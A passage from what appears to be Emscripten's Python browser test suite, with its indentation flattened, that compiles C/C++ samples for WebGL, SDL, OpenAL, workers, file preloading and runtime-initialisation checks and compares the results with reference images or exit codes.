self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_mt.c'), reference=Path('third_party/cubegeom', 'cubegeom_mt.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color2.c'), reference=Path('third_party/cubegeom', 'cubegeom_color2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_texturematrix.c'), reference=Path('third_party/cubegeom', 'cubegeom_texturematrix.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_fog.c'), reference=Path('third_party/cubegeom', 'cubegeom_fog.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2_vao2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao_es.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sFULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_u4fv_2.c'), reference=Path('third_party/cubegeom', 'cubegeom_u4fv_2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-sGL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-sLEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-sSTRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point {
int x, y;
};
''')
create_file('supp.c', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point *p) {
printf("supp: %d,%d\n", p->x, p->y);
mainFunc(p->x + p->y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.c', r'''
#include <stdio.h>
#include <assert.h>
#include "header.h"
extern void suppFunc(struct point *p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
assert(x == 56);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(&p);
printf("main see: %d\nok.\n", suppInt);
assert(suppInt == 76);
return 0;
}
''')
self.run_process([EMCC, 'supp.c', '-o', 'supp.wasm', '-sSIDE_MODULE', '-O2'])
self.btest_exit('main.c', args=['-sMAIN_MODULE=2', '-O2', 'supp.wasm'])
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
self.set_setting('WASM_ASYNC_COMPILATION', 0)
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
args = ['-sWASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1']
# with assertions, we notice when memory was written to too early
expected = 'abort:Assertion failed: native function `note` called before runtime initialization'
self.btest('mem_init.cpp', expected=expected, args=args)
# otherwise, we just overwrite
self.btest_exit('mem_init.cpp', args=args + ['-sASSERTIONS=0'])
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
maybeReportResultToServer('got_error');
}
console.log('WARNING: ' + x);
};
''')
self.btest('mem_init_request.cpp', expected=status, args=['-sWASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
self.set_setting('EXIT_RUNTIME')
test('test.html.mem', 'exit:0')
test('nothing.nowhere', 'got_error')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3:' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-sWASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(Path('browser/cwrap_early.cpp'), args=['-O2', '-sASSERTIONS', '--pre-js', test_file('browser/cwrap_early.js'), '-sEXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-O2', '--minify=0', '-sEXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one', '-sASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_with_pthread_compilation_fails(self):
self.run_process([EMCC, '-c', '-o', 'hello.o', test_file('hello_world.c')])
stderr = self.expect_fail([EMCC, 'hello.o', '-o', 'a.js', '-g', '--closure=1', '-sUSE_PTHREADS', '-sBUILD_AS_WORKER=1'])
self.assertContained("USE_PTHREADS + BUILD_AS_WORKER require separate modes that don't work together, see https://github.com/emscripten-core/emscripten/issues/8854", stderr)
def test_emscripten_async_wget2(self):
self.btest_exit('test_emscripten_async_wget2.cpp')
@disabled('https://github.com/emscripten-core/emscripten/issues/15818')
def test_emscripten_async_wget2_data(self):
create_file('hello.txt', 'Hello Emscripten!')
self.btest('test_emscripten_async_wget2_data.cpp', expected='0')
def test_emscripten_async_wget_side_module(self):
self.run_process([EMCC, test_file('browser_module.c'), '-o', 'lib.wasm', '-O2', '-sSIDE_MODULE'])
self.btest_exit('browser_main.c', args=['-O2', '-sMAIN_MODULE=2'])
@parameterized({
'non-lz4': ([],),
'lz4': (['-sLZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-sSIDE_MODULE', '-O2', '-o', 'library.so'])
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return preloadedWasm['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-sMAIN_MODULE=2', '--preload-file', '.@/', '-O2', '--use-preload-plugins'] + args)
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest_exit('hello_world_gles.c', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid/test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = read_file('test.js')
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid/test.js'))
try_delete(test_file('uuid/test.js.map'))
# Now run test in browser
self.btest_exit(test_file('uuid/test.c'), args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],),
'legacy': (['-sMIN_FIREFOX_VERSION=0', '-sMIN_SAFARI_VERSION=0', '-sMIN_IE_VERSION=0', '-sMIN_EDGE_VERSION=0', '-sMIN_CHROME_VERSION=0', '-Wno-transpile'],)
})
@requires_threads
def test_html5_core(self, opts):
if '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0' in opts:
# In this mode an exception can be thrown by the browser, and we don't
# want the test to fail in that case so we override the error handling.
create_file('pre.js', '''
window.disableErrorReporting = true;
window.addEventListener('error', (event) => {
if (!event.message.includes('exception:fullscreen error')) {
report_error(event);
}
});
''')
self.emcc_args.append('--pre-js=pre.js')
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
print(opts)
self.btest_exit(test_file('test_gamepad.c'), args=[] + opts)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1'], ['-sUSE_PTHREADS']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'])
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest_exit(test_file('webgl_create_context2.cpp'))
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -sDISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser/html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'])
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest_exit(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'])
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
@requires_graphics_hardware
def test_webgl_shader_source_length(self):
for opts in [[], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'])
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
@requires_graphics_hardware
def test_webgl_unmasked_vendor_webgl(self):
self.btest_exit(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'])
@requires_graphics_hardware
def test_webgl2(self):
for opts in [
['-sMIN_CHROME_VERSION=0', '-Wno-transpile'],
['-O2', '-g1', '--closure=1', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-sFULL_ES2=1'],
]:
print(opts)
self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + opts)
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest_exit(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-sUSE_PTHREADS'])
@requires_graphics_hardware
def test_webgl2_objects(self):
self.btest_exit(test_file('webgl2_objects.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_html5_webgl_api(self):
for mode in [['-sOFFSCREENCANVAS_SUPPORT', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
['-sOFFSCREEN_FRAMEBUFFER', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest_exit(test_file('html5_webgl.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + mode)
@requires_graphics_hardware
def test_webgl2_ubos(self):
self.btest_exit(test_file('webgl2_ubos.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'])
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'))
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest_exit(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-sWEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'])
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest_exit(test_file('test_webgl2_runtime_no_context.cpp'), args=['-sMAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest_exit(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-sMAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest_exit(test_file('webgl_with_closure.cpp'), args=['-O2', '-sMAX_WEBGL_VERSION=2', '--closure=1', '-lGL'])
# Tests that -sGL_ASSERTIONS and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest_exit(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-sMAX_WEBGL_VERSION=2', '-sGL_ASSERTIONS'])
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest_exit(test_file('webgl2_pbo.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party/sokol/mipmap-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=Path('third_party/sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party/sokol/mrt-emcc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party/sokol/arraytex-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest_exit(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'])
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget.c'), args=['-sASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget_data.c'), args=['-O2', '-g2', '-sASYNCIFY'])
@parameterized({
'': ([],),
'es6': (['-sEXPORT_ES6=1'],),
})
def test_locate_file(self, args):
self.set_setting('EXIT_RUNTIME')
for wasm in [0, 1]:
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
shutil.move('test.data', Path('sub/test.data'))
self.run_browser('page.html', None, '/report_result?exit:0')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-sSAFE_HEAP', '-sASSERTIONS', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
self.run_browser('page.html', None, '/report_result?exit:' + expected)
in_html('0')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
